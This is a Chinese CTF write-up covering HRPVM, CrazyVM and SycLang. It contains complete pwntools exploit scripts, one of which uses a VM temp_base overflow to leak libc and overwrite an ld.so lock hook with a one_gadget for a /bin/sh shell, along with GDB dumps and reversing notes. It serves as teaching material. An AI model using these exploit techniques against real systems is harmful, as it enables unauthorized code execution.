# -*- coding:utf-8 -*-
from pwn import *

# Target selection and pwntools context. The bodies of the two `if`
# statements are indented again so the script parses.
arch = 64
challenge = './HRPVM'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

# Short aliases over the pwntools tube `p`. Each lambda looks `p` up when it
# is called, so `p` may be assigned after these definitions.
rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: `s` is a variable *name* that gets eval()'d; only pass trusted literals.
# The colour codes need the ESC prefix (\033) to be real ANSI escapes.
lg = lambda s : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# The pad must be the single NUL byte b'\x00'; a multi-byte fill makes ljust() raise.
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

# Open the tube: a local process when `local` is truthy, else the remote
# service. Branch bodies are indented again so the script parses.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')

def debug():
    """Attach gdb to the target with two breakpoints set."""
    #gdb.attach(p)
    breakpoints = "b *$rebase(0x248E)\nb *$rebase(0x220B)\n"
    gdb.attach(p, breakpoints)
    #pause()

def cmd(op):
    """Send ``op`` (converted with str()) as a line after ">" is received."""
    choice = str(op)
    sla(">", choice)

def pwn(name):
    """Send "./<name>" at the shell prompt."""
    command = "./"+name
    sla("HRP-MACHINE$ ", command)

def add(name,data):
    """Issue the "file" command, then answer the name and content prompts."""
    prompts = (
        ("HRP-MACHINE$ ", "file"),
        ("FILE NAME: ", name),
        ("FILE CONTENT: ", data),
    )
    for prompt, reply in prompts:
        sla(prompt, reply)

def dele(name):
    """Send "rm <name>" at the shell prompt."""
    command = "rm "+name
    sla("HRP-MACHINE$ ", command)

#debug()

# First login.  login_system reads the answer to "[+]HOLDER:" into the
# global buffer `dest`.
sla("USER NAME:","HRPHRP")
sla("PASSWORD:","PWNME")
sla("[+]HOLDER:","YHELLOW")

# Three small programs in the VM's own text syntax.
# NOTE(review): the meaning of the operands 35 / 36 / 1001 is specific to the
# HRPVM interpreter and is not visible from this script - confirm against it.
payload = "mov rdi,1;"
payload += "mov rsi,36;"
payload += "mov rdx,1001;"
payload += "mov rax,1;"
payload += "call write,1;"

payload2 = "mov rdi,35;"
payload2 += "mov rsi,0;"
payload2 += "mov rax,2;"
payload2 += "call open,2;"

payload3 = "mov rdi,36;"
payload3 += "mov rsi,1001;"
payload3 += "mov rax,2;"
payload3 += "call open,2;"

add("write",payload)
add("open",payload2)
add("open2",payload3)

# 29 filler files named "0".."28".
# NOTE(review): the reason for exactly 29 is not stated here; presumably it
# fills the file table up to a needed index - confirm.
for i in range(29):
    add(str(i),"1111")

pwn("open")

# DEBUG shell: register the name "flag" through "file input", then use the
# mmap command to map 0x400 read/write bytes at 0x560000000000 so that a
# later write to that address does not fault.
sla("HRP-MACHINE$ ","DEBUG")
sla("[+][DEBUGING]root#","file input")
sla("FILE NAME:","flag")
sla("[+][DEBUGING]root#","mmap")
sla("[+]ADDR EXPEND:",str(0x560000000000))
sla("[+][DEBUGING]root#","exit")

# reboot runs login_system again; this time the HOLDER answer is the raw
# 8-byte address of the mapping created above.
sla("HRP-MACHINE$ ","reboot")
sla("USER NAME:","HRPHRP")
sla("PASSWORD:","PWNME")
sla("[+]HOLDER:",p64(0x560000000000))

pwn("open2")
pwn("write")

p.interactive()

CrazyVM

1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31
1
2
3
4
5
6
CrazyVM: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=db8e268984b1b742f3813cdb5662ef47af09628d, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序分析

首先,程序没法直接控制 malloc / free,应该不是打堆;Full RELRO 也打不了 GOT 表;另外程序中没有特殊字符串,也没有类似 strcmp 的函数

上述这些特点说明:本程序需要逆向虚拟机指令格式,猜测应该是自定义了一个虚拟机指令格式,我们需要逆向该指令格式并找到漏洞(漏洞点极有可能是溢出)

  • 虚拟机有两种实现方式:
    • 一种是将虚拟机字节码翻译为 ELF 指令,然后交给 CPU 运行(这种通常要打 shellcode)
    • 一种是在虚拟机内部实现各个指令的函数,通过这些函数模拟指令执行的过程(这种通常要注意溢出漏洞)

随便输入点数据试试程序结构:

1
2
3
4
code = "1111"
data = "2222"
sla("input code for vm: ",code)
sla("input data for vm: ",data)

在 GDB 中调试分析:

1
2
3
4
5
0x55d73e8fe290      0x0                 0x170		/* info */
0x55d73e8fe400 0x0 0x20 /* node */
0x55d73e8fe420 0x55d73e8fe430 0x10010 /* data */
0x55d73e90e430 0x0 0x20 /* node */
0x55d73e90e450 0x7fa93f84f010 0x20 /* node */
  • 整体堆布局:核心控制信息 info,3个次要信息 node,1个缓冲区
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
pwndbg> telescope 0x55d73e8fe2a0 /* INFO */
00:0000│ rax rdi 0x55d73e8fe2a0 ◂— 0x0
... ↓ 7 skipped
08:00400x55d73e8fe2e0 ◂— 0x0
... ↓ 7 skipped
10:00800x55d73e8fe320 ◂— 0x7f00000000080000
11:00880x55d73e8fe328 ◂— 0x7f00000000080000
12:00900x55d73e8fe330 ◂— 0x0
13:00980x55d73e8fe338 ◂— 0x0
14:00a0│ 0x55d73e8fe340 —▸ 0x55d73e8fe410 ◂— 0x0 /* NODE-code */
15:00a8│ 0x55d73e8fe348 —▸ 0x55d73e90e440 ◂— 0x7f00000000000000 /* NODE-fini */
16:00b0│ 0x55d73e8fe350 —▸ 0x55d73e90e460 ◂— 0x5000000000000000 /* NODE-data */
17:00b8│ 0x55d73e8fe358 ◂— 0x0
18:00c0│ 0x55d73e8fe360 ◂— 0x0
... ↓ 7 skipped
20:01000x55d73e8fe3a0 ◂— 0x0
... ↓ 7 skipped
28:01400x55d73e8fe3e0 ◂— 0x0
... ↓ 4 skipped
  • Info + 20*8(即偏移 0xA0)的位置起有3个 Node 指针(node_code / node_temp / node_data)
  • 分析出第1个 chunk 用于管理 code,第3个 chunk 用于管理 data
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0x55d73e8fe400 /* NODE-code */
00:00000x55d73e8fe400 ◂— 0x0
01:00080x55d73e8fe408 ◂— 0x21 /* '!' */
02:00100x55d73e8fe410 ◂— 0x0
03:00180x55d73e8fe418 ◂— 0x10000
04:00200x55d73e8fe420 —▸ 0x55d73e8fe430 ◂— 0xa31313131 /* '1111\n' */
pwndbg> telescope 0x55d73e90e430 /* NODE-fini */
00:00000x55d73e90e430 ◂— 0x0
01:00080x55d73e90e438 ◂— 0x21 /* '!' */
02:00100x55d73e90e440 ◂— 0x7f00000000000000
03:00180x55d73e90e448 ◂— 0x100000
04:00200x55d73e90e450 —▸ 0x7fa93f84f010 ◂— 0x0
pwndbg> telescope 0x55d73e90e450 /* NODE-data */
00:00000x55d73e90e450 —▸ 0x7fa93f84f010 ◂— 0x0
01:00080x55d73e90e458 ◂— 0x21 /* '!' */
02:00100x55d73e90e460 ◂— 0x5000000000000000
03:00180x55d73e90e468 ◂— 0x20000
04:00200x55d73e90e470 —▸ 0x7fa93f82e010 ◂— 0xa32323232 /* '2222\n' */
  • 目前不知道第2个 chunk 的信息
  • PS:由于 size 过大,导致 calloc 调用了 mmap

通过调试分析可以初步提取出如下两个结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
00000000 Info struc ; (sizeof=0x180, mappedto_8)
00000000 buf dq 16 dup(?)
00000080 temp_base dq ?
00000088 data_base dq ?
00000090 code_base dq ?
00000098 field_98 dq ?
000000A0 node_code dq ? ; offset
000000A8 node_temp dq ? ; offset
000000B0 node_data dq ? ; offset
000000B8 field_B8 dq ?
000000C0 field_C0 dq ?
000000C8 field_C8 dq ?
000000D0 field_D0 dq ?
000000D8 field_D8 dq ?
000000E0 field_E0 dq ?
000000E8 field_E8 dq ?
000000F0 field_F0 dq ?
000000F8 field_F8 dq ?
00000100 field_100 dq ?
00000108 field_108 dq ?
00000110 field_110 dq ?
00000118 field_118 dq ?
00000120 key db ?
00000121 db ? ; undefined
00000122 db ? ; undefined
00000123 db ? ; undefined
00000124 db ? ; undefined
00000125 db ? ; undefined
00000126 db ? ; undefined
00000127 db ? ; undefined
00000128 code dq ?
00000130 key2 db ?
00000131 db ? ; undefined
00000132 db ? ; undefined
00000133 db ? ; undefined
00000134 db ? ; undefined
00000135 db ? ; undefined
00000136 db ? ; undefined
00000137 db ? ; undefined
00000138 t_rsi dq ?
00000140 t_rdx dq ?
00000148 t_rcx dq ?
00000150 t_r8 dq ?
00000158 func dq ? ; offset
00000160 key3 db ?
00000161 db ? ; undefined
00000162 db ? ; undefined
00000163 db ? ; undefined
00000164 db ? ; undefined
00000165 db ? ; undefined
00000166 db ? ; undefined
00000167 db ? ; undefined
00000168 field_168 dq ?
00000170 field_170 dq ?
00000178 field_178 dq ?
00000180 Info ends
1
2
3
4
5
00000000 Node struc ; (sizeof=0x18, mappedto_9)
00000000 base dq ?
00000008 size dq ?
00000010 chunk dq ? ; offset
00000018 Node ends

在函数 hand_key 中有非常复杂的 Switch-case 结构,猜测程序在这里完成指令执行的工作:

1
2
3
4
5
6
7
8
9
10
11
case 1u:
if ( !op1 || op1 == 2 || op1 == 3 )
{
ptr->key2 = 1;
ptr->func = sub_176C;
ptr->r_rdi = op1;
ptr->r_rsi = op2;
ptr->r_rdx = BYTE3(ptr->code);
ptr->r_rcx = (unsigned __int8)BYTE4(ptr->code);
re = 0;
}
  • 对于每一个 case,程序都设计了一个函数来完成其功能
  • 这里只能断点调试,通过输入值和返回值来判断该函数的功能

漏洞分析

1
2
3
4
5
6
.text:000000000000D77D 48 8B 45 E8                   mov     rax, [rbp+var_18]
.text:000000000000D781 48 8B B0 38 01 00 00 mov rsi, [rax+138h]
.text:000000000000D788 48 8B 45 E8 mov rax, [rbp+var_18]
.text:000000000000D78C 49 89 F8 mov r8, rdi
.text:000000000000D78F 48 89 C7 mov rdi, rax
.text:000000000000D792 41 FF D1 call r9
  • 程序会运行一个函数指针

该程序的漏洞极有可能是堆溢出(覆盖函数指针),但程序对 op3-offset 进行了限制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
switch ( op1 )
{
case 0u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 1u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 2u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 3u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 4u:
if ( BYTE3(ptr->code) <= 0x11uLL )
goto true;
result = 0xFFFFFFFFLL;
break;
case 5u:
  • 想要绕过这个限制就必须让 op1 为“5”,导致多数指令没法正常执行

在程序的第 0x12 和 0x13 号指令中还有另一处漏洞:

1
2
3
4
5
ptr->temp_base -= 8LL;
if ( offset <= 0xF )
*(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base] = ptr->buf[offset];// 0x80000-8
else
*(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base] = ptr->temp_base;
  • 指令 0x12 可以将任意数据存储到 ptr->node_temp->chunk 指向的堆空间中
1
2
3
4
5
ptr->temp_base += 8LL;
if ( offset <= 0xF )
ptr->buf[offset] = *(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base - 8];// 0x80000-8
else
ptr->temp_base = *(_QWORD *)&ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base - 8];
  • 指令 0x13 可以将 ptr->node_temp->chunk 中的数据取出,并且可以控制 ptr->temp_base

关键点就在于 ptr->temp_base 是可控的,并且程序没有对 ptr->temp_base 的范围进行检查,这就导致了 mmap 的堆空间发生溢出

入侵思路

由于 mmap 的堆空间发生溢出,我们就有机会劫持 free_hook

利用下面的脚本可以将 libc-calloc 提取出来,并且导致 ptr->node_temp->chunk[ptr->temp_base - ptr->node_temp->base - 8] 索引到 libc-GOT:

1
2
3
4
5
6
7
code =  intemp(0x10) 
code += outtemp(0)
code += mov(1,0x323020+8-0x80000)
code += add(0,1)
code += intemp(0)
code += outtemp(0x10)
code += outtemp(2)
1
2
3
4
5
pwndbg> telescope 0x559f7a2bb2a0
00:0000│ rdi 0x559f7a2bb2a0 ◂— 0x7f00000000323020 /* ' 02' */
01:00080x559f7a2bb2a8 ◂— 0x2a3028 /* '(0*' */
02:00100x559f7a2bb2b0 —▸ 0x7f7d06f06c90 (calloc) ◂— endbr64
03:00180x559f7a2bb2b8 ◂— 0x0

再加上下面脚本就可以成功劫持 libc-GOT(calloc):

1
2
3
code += mov(1,0xe6aee-0x9ec90)
code += add(2,1)
code += intemp(2)
  • 劫持前:
1
2
3
4
5
6
7
07:00380x7f068029e018 (_dl_catch_exception@got.plt) —▸ 0x7f06801df6a0 (_dl_catch_exception) ◂— endbr64 
08:00400x7f068029e020 (malloc@got.plt) —▸ 0x7f0680119260 (malloc) ◂— endbr64
09:00480x7f068029e028 (_dl_signal_exception@got.plt) —▸ 0x7f06801df5f0 (_dl_signal_exception) ◂— endbr64
0a:00500x7f068029e030 (calloc@got.plt) —▸ 0x7f068011ac90 (calloc) ◂— endbr64
0b:00580x7f068029e038 (realloc@got.plt) —▸ 0x7f068011a000 (realloc) ◂— endbr64
0c:00600x7f068029e040 (_dl_signal_error@got.plt) —▸ 0x7f06801df640 (_dl_signal_error) ◂— endbr64
0d:00680x7f068029e048 (_dl_catch_error@got.plt) —▸ 0x7f06801df7c0 (_dl_catch_error) ◂— endbr64
  • 劫持后:
1
0c:0060│ rcx 0x7f068029e030 (calloc@got.plt) —▸ 0x7f0680162aee (execvpe+638) ◂— mov    rdx, r12

不过 calloc-GOT 显然无法触发,因此我们需要重新计算一下偏移去劫持 exit_hook

1
2
3
pwndbg> telescope 0x7f0afda13010+0x323020
00:00000x7f0afdd36030 (calloc@got.plt) —▸ 0x7f0afdbb2c90 (calloc) ◂— endbr64
01:00080x7f0afdd36038 (realloc@got.plt) —▸ 0x7f0afdbb2000 (realloc) ◂— endbr64
1
2
3
4
5
6
7
pwndbg> p rtld_lock_default_lock_recursive
$3 = {void (void *)} 0x7fa350ad8150 <rtld_lock_default_lock_recursive>
pwndbg> search -t qword 0x7fa350ad8150
Searching for value: b'P\x81\xadP\xa3\x7f\x00\x00'
ld-2.31.so 0x7fa350b05f68 0x7fa350ad8150
pwndbg> distance 0x7fa3507e2010 0x7fa350b05f68
0x7fa3507e2010->0x7fa350b05f68 is 0x323f58 bytes (0x647eb words)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
# -*- coding:utf-8 -*-
from pwn import *

# Target description: word size of the binary and path to the challenge file.
arch = 64
challenge = './CrazyVM1'

context.os = 'linux'
#context.log_level = 'debug'
# Pick the pwntools architecture that matches the target word size.
if arch == 64:
    context.arch = 'amd64'
elif arch == 32:
    context.arch = 'i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# Short aliases around the global tube `p` (created further down the script).
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# lg = lambda s,addr : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
# NOTE: `lg` eval()s its argument to look a variable up by name; only ever
# pass it literal names written in this script.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak to 4 / 8 bytes before unpacking it.  The fill must be
# the single byte b'\x00'; the backslash had been lost, which made ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# local = 1 starts the challenge binary as a subprocess; 0 connects to the
# remote service instead.
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35', '10111')

def debug():
    """Attach GDB to `p` with a breakpoint at $rebase(0xB58C), then pause."""
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0xB58C)\n") #0xD792
    pause()

def cmd(op):
    """Wait for the ">" prompt and send `op` (converted with str()) as a line."""
    sla(">",str(op))

def op(op,rsi,rdx,rcx,r8):
    """Encode one 8-byte VM instruction.

    The first four arguments are packed as single bytes with p8() in the
    order given (`op` is the opcode byte), followed by `r8` packed as a
    32-bit value with p32().
    """
    return p8(op)+p8(rsi)+p8(rdx)+p8(rcx)+p32(r8)

def mov(offset,data):
    """Encode opcode 1 with mode bytes (1, 2), register index `offset` and immediate `data`.

    NOTE(review): presumably loads the 32-bit immediate `data` into VM
    register `offset` - confirm against the interpreter.
    """
    return op(1,1,2,offset,data)

def intemp(offset):
    """Encode opcode 0x12: push onto the VM's temp area.

    Per the decompiled handler, the VM first subtracts 8 from temp_base and
    then stores buf[offset] when offset <= 0xF, or temp_base itself for any
    larger value (0x10 is used for that here).
    """
    return op(0x12,4,3,offset,0)

def outtemp(offset):
    """Encode opcode 0x13: pop from the VM's temp area.

    Per the decompiled handler, the VM first adds 8 to temp_base and then
    loads the qword just below it into buf[offset] when offset <= 0xF, or
    into temp_base itself for any larger value (0x10 is used for that here).
    """
    return op(0x13,4,3,offset,0)

def add(offset,data):
    """Encode opcode 2 with mode bytes (0, 3), byte operand `offset` and 32-bit operand `data`.

    NOTE(review): judging by its call sites (add(1,0), add(3,1)) this
    presumably adds register `data` into register `offset` - confirm.
    """
    return op(2,0,3,offset,data)

#debug()

# Stage 1: copy temp_base into register 0, add a constant offset to it and
# load the result back into temp_base, then pop one qword into register 3.
# NOTE(review): per the write-up this lands on libc's calloc GOT slot, so
# register 3 presumably receives the address of calloc - confirm in GDB.
stage_leak = [
    intemp(0x10),
    outtemp(0),
    mov(1,0x323020+8-0x80000),
    add(1,0),
    intemp(1),
    outtemp(0x10),
    outtemp(3),
]

# Stage 2: add (one_gadget offset 0xe6aee - 0x9ec90) to register 3.
# NOTE(review): 0x9ec90 is presumably calloc's offset in this libc - confirm.
stage_gadget = [
    mov(1,0xe6aee-0x9ec90),
    add(3,1),
]

# Stage 3: move temp_base again, using the measured distance 0x323f58 to the
# ld.so slot that holds rtld_lock_default_lock_recursive, then push register 3.
stage_hijack = [
    mov(1,0x323f58+0x10-0x80000),
    add(1,0),
    intemp(1),
    outtemp(0x10),
    intemp(3),
]

code = b"".join(stage_leak + stage_gadget + stage_hijack)

data = "1"

sa("input code for vm: ",code)
sa("input data for vm: ",data)

"""
0xe6aee execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL

0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
"""

p.interactive()

SycLang 出题思路

本题目提供了中间代码和编译器前端,要求将中间代码逆向回C,自行编译后解出 flag(当然也可以直接通过中间代码分析 flag)

首先,本程序有3个陷阱:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!tempa := {#8}*{var16<+64>}
var12<+32> := var22(@exp.key[0])<+8><+488><+tempa>
temp84 := #1
temp85 := var15<+56> + temp84
var18<+80> := temp85
#!tempa := {#8}*{var18<+80>}
var13<+40> := var22(@exp.key[0])<+8><+488><+tempa>
temp86 := #0
var13<+40> := temp86
temp87 := var12<+32> ^ var13<+40>
var14<+48> := temp87
#!tempa := {#8}*{var16<+64>}
var22(@exp.key[0])<+8><+488><+tempa> := var14<+48>
  • var13<+40> 在异或前会赋值“0”,因此对 e1.key(var22(@exp.key[0])<+8><+488><+tempa>) 的异或加密失效
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
LABEL label59 :
temp89 := #0
var24(@exp.L[0])<+200><+1256> := temp89
temp91 := #12
var24(@exp.R[0])<+264><+1256> := temp91
temp93 := #0

......

var24(@exp.key[23])<+192><+1256> := temp195
temp196 := #23
var15<+56> := temp196
LABEL label118 :
temp198 := #0
IF var15<+56> > temp198 GOTO label117
GOTO label116
LABEL label117 :
var18<+80> := var15<+56>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var24(@exp.key[0])<+8><+1256><+tempa>
temp199 := #1
temp200 := var15<+56> - temp199
var16<+64> := temp200
#!tempa := {#8}*{var16<+64>}
var17<+72> := var24(@exp.key[0])<+8><+1256><+tempa>
temp201 := var19<+88> - var17<+72>
var21<+104> := temp201
#!tempa := {#8}*{var15<+56>}
var24(@exp.key[0])<+8><+1256><+tempa> := var21<+104>
temp197 := #1
var15<+56> := var15<+56> - temp197
GOTO label118
LABEL label116 :
temp202 := #0
var15<+56> := temp202
LABEL label126 :
temp204 := #8
IF var15<+56> < temp204 GOTO label125
GOTO label124
LABEL label125 :
#!tempa := {#8}*{var15<+56>}
var16<+64> := var24(@exp.L[0])<+200><+1256><+tempa>
#!tempa := {#8}*{var15<+56>}
var18<+80> := var24(@exp.R[0])<+264><+1256><+tempa>
#!tempa := {#8}*{var15<+56>}
var20<+96> := var24(@exp.X[0])<+328><+1256><+tempa>
#!tempa := {#8}*{var16<+64>}
var17<+72> := var24(@exp.key[0])<+8><+1256><+tempa>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var24(@exp.key[0])<+8><+1256><+tempa>
var17<+72> := var17<+72> + var20<+96>
var19<+88> := var19<+88> - var20<+96>
#!tempa := {#8}*{var16<+64>}
var24(@exp.key[0])<+8><+1256><+tempa> := var17<+72>
#!tempa := {#8}*{var18<+80>}
var24(@exp.key[0])<+8><+1256><+tempa> := var19<+88>
temp203 := #1
var15<+56> := var15<+56> + temp203
GOTO label126
LABEL label124 :
temp207 := #1
var15<+56> := temp207
LABEL label137 :
temp209 := #24
IF var15<+56> < temp209 GOTO label136
GOTO label135
LABEL label136 :
#!tempa := {#8}*{var15<+56>}
var17<+72> := var24(@exp.key[0])<+8><+1256><+tempa>
temp210 := #1
temp211 := var15<+56> - temp210
var16<+64> := temp211
#!tempa := {#8}*{var16<+64>}
var20<+96> := var24(@exp.key[0])<+8><+1256><+tempa>
var17<+72> := var17<+72> + var20<+96>
#!tempa := {#8}*{var15<+56>}
var24(@exp.key[0])<+8><+1256><+tempa> := var17<+72>
temp208 := #1
var15<+56> := var15<+56> + temp208
GOTO label137
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
LABEL label168 :
temp263 := #24
IF var15<+56> < temp263 GOTO label167
GOTO label166
LABEL label167 :
var16<+64> := var15<+56>
#!tempa := {#8}*{var16<+64>}
var17<+72> := var23(@exp.key[0])<+8><+872><+tempa>
var18<+80> := var15<+56>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var24(@exp.key[0])<+8><+1256><+tempa>
temp264 := var17<+72> ^ var19<+88>
var21<+104> := temp264
#!tempa := {#8}*{var15<+56>}
var23(@exp.key[0])<+8><+872><+tempa> := var21<+104>
temp262 := #1
var15<+56> := var15<+56> + temp262
GOTO label168
  • e3.key(var24(@exp.key[0])<+8><+1256><+tempa>) 的前缀和差分加密会导致 e3.key 全为 “0”,进而对 e2.key(var23(@exp.key[0])<+8><+872><+tempa>) 的异或加密失效
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
LABEL label271 :
#!tempa := {#8}*{var15<+56>}
var16<+64> := var25(@exp.L[0])<+200><+1640><+tempa>
#!tempa := {#8}*{var15<+56>}
var18<+80> := var25(@exp.R[0])<+264><+1640><+tempa>
#!tempa := {#8}*{var15<+56>}
var20<+96> := var25(@exp.X[0])<+328><+1640><+tempa>
#!tempa := {#8}*{var16<+64>}
var17<+72> := var25(@exp.key[0])<+8><+1640><+tempa>
#!tempa := {#8}*{var18<+80>}
var19<+88> := var25(@exp.key[0])<+8><+1640><+tempa>
var17<+72> := var17<+72> - var20<+96>
var19<+88> := var19<+88> + var20<+96>
#!tempa := {#8}*{var16<+64>}
var25(@exp.key[0])<+8><+1640><+tempa> := var17<+72>
#!tempa := {#8}*{var18<+80>}
var25(@exp.key[0])<+8><+1640><+tempa> := var19<+88>
temp369 := #1
var15<+56> := var15<+56> + temp369
GOTO label272
LABEL label270 :
temp373 := #1
var15<+56> := temp373
LABEL label283 :
temp375 := #24
IF var15<+56> < temp375 GOTO label282
GOTO label281
LABEL label282 :
#!tempa := {#8}*{var15<+56>}
var17<+72> := var25(@exp.key[0])<+8><+1640><+tempa>
temp376 := #1
temp377 := var15<+56> - temp376
var16<+64> := temp377
#!tempa := {#8}*{var16<+64>}
var20<+96> := var25(@exp.key[0])<+8><+1640><+tempa>
var17<+72> := var17<+72> + var20<+96>
#!tempa := {#8}*{var15<+56>}
var25(@exp.key[0])<+8><+1640><+tempa> := var17<+72>
temp374 := #1
var15<+56> := var15<+56> + temp374
GOTO label283
  • e4.key(var25(@exp.key[0])<+8><+1640><+tempa>) 的前缀和差分加密最后会得到一个 fake flag

程序有效部分的核心逻辑如下:

  • 程序读取 flag 存入 e1.key 进行第一次前缀和差分,区间修改的操作数在 e1.L,e1.R,e1.X 中(已知)
  • 将第一轮计算的结果每隔 3 个取 1 个(下标 0,3,…,21,共 8 个)存入 e2.X,当做第二次前缀和差分的操作数
  • 第二次使用 e1.L,e1.R,e2.X 对 e2.key(初始值已知)进行前缀和差分
  • 最后对比 e1.key 与 e2.key,完全相同则 success

前缀和差分相当于对 [L,R) 的所有数字 +X:

  • 由于第一次前缀和的操作数已知,得到结果 e1.key[i] = INPUT[i] + C[i]
  • 由于第二次前缀和差分需要用到第一次前缀和差分的结果,此时的 X[i] 已经变成 INPUT[i*3] + C[i*3],结果 e2.key[i] 表达为 INPUT[j1] + INPUT[j2] ...... INPUT[jn] + C[j]
  • 由于 e2.key 的初始值已知,常数 C[j] 可通过 e1.L,e1.R,e1.X 算出,加密后的 e1.key[i] 可以由含有 INPUT[j] 的式子来表示,加密后的 e2.key[i] 也可以用含有 INPUT[j] 的式子来表示,两者结合可以得到 24 组一次方程

通过中间代码提取出来的C代码样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
for(i=0;i<24;i++){
key1 = 0;
x = i;
key1 = flag[x];
y = 23 - i;
e1.key[y] = key1;
}

for(i=23;i>0;i--){
y = i;
ky = e1.key[y];
x = i - 1;
kx = e1.key[x];
kz = ky - kx;
e1.key[i] = kz;
}

e1.L[0] = 0;
e1.R[0] = 8;
e1.X[0] = 11;
e1.L[1] = 15;
e1.R[1] = 23;
e1.X[1] = 0-13;
e1.L[2] = 2;
e1.R[2] = 11;
e1.X[2] = 17;
e1.L[3] = 10;
e1.R[3] = 20;
e1.X[3] = 0-19;
e1.L[4] = 6;
e1.R[4] = 13;
e1.X[4] = 23;
e1.L[5] = 9;
e1.R[5] = 21;
e1.X[5] = 0-29;
e1.L[6] = 1;
e1.R[6] = 19;
e1.X[6] = 31;
e1.L[7] = 4;
e1.R[7] = 17;
e1.X[7] = 0-37;

for(i=0;i<8;i++){
x = e1.L[i];
y = e1.R[i];
z = e1.X[i];
kx = e1.key[x];
ky = e1.key[y];
kx += z;
ky -= z;
e1.key[x] = kx;
e1.key[y] = ky;
}

for(i=1;i<24;i++){
kx = e1.key[i];
x = i-1;
z = e1.key[x];
kx += z;
e1.key[i] = kx;
}

e2.key[0]=252;
e2.key[1]=352;
e2.key[2]=484;
e2.key[3]=470;
e2.key[4]=496;
e2.key[5]=487;
e2.key[6]=539;
e2.key[7]=585;
